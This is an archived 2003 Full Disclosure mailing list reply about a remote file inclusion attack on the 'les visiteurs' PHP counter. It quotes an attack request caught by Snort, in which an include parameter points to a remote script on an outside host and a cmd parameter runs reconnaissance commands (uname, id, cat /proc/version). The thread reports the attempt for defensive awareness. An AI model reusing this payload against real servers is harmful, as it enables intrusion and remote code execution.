Full Disclosure mailing list archives
Re: file inclusion (les visiteurs)
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Mon, 1 Dec 2003 19:07:35 +0100
Hi Daniel , They are kiddies... :( I was looking the files and there are only high-risk-rated exploits downloaded from packet storm , ptrace , etc . And they are running remote php shells in their server.... xD See you in the IRC tonight ? Best regards, ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->\x74\x72\x75\x6c\x75\x78 0x02->The truth is out there, 0x03-> outside your mind . __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** \x6e\x73\x72\x67 \x73\x65\x63\x75\x72\x69\x74\x79 \x72\x65\x73\x65\x61\x72\x63\x68 http://www.nsrg-security.com ______________________ ----- Original Message ----- From: "Dan" <dan () lockedbox net> To: <full-disclosure () lists netsys com> Sent: Monday, December 01, 2003 6:02 PM Subject: Re: [Full-disclosure] file inclusion (les visiteurs)
This is the same set of files that I noticed last week(xfteam.net) it
seems
they closed their domain down? (I cannot find it) Does anyone know if these ppl are a real sec organisation? or just some kiddies ? Cheers, Daniel. "Evert Daman" <evert () digipix org> wrote:last night snort detected this request: GET
/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid. org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
because i patched 'les visiteurs' as described by 'matthieu peschaud' on bugtraq on the 26 of october nothing happend, but it looks like
someone
is trying to exploit this bug. just want to mention it to this wonderfull list :) kind regards, Evert_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- file inclusion (les visiteurs) Evert Daman (Dec 01)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
- Re: file inclusion (les visiteurs) Dan (Dec 01)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
- Re: file inclusion (les visiteurs) Evert Daman (Dec 01)
- Re: file inclusion (les visiteurs) gazpa (Dec 01)
- Re: file inclusion (les visiteurs) Christian Horchert (Dec 01)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 02)
- Re: file inclusion (les visiteurs) gazpa (Dec 02)
- Re: file inclusion (les visiteurs) Christian Horchert (Dec 02)
- Re: file inclusion (les visiteurs) Evert Daman (Dec 03)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
- Re: file inclusion (les visiteurs) Christian Horchert (Dec 01)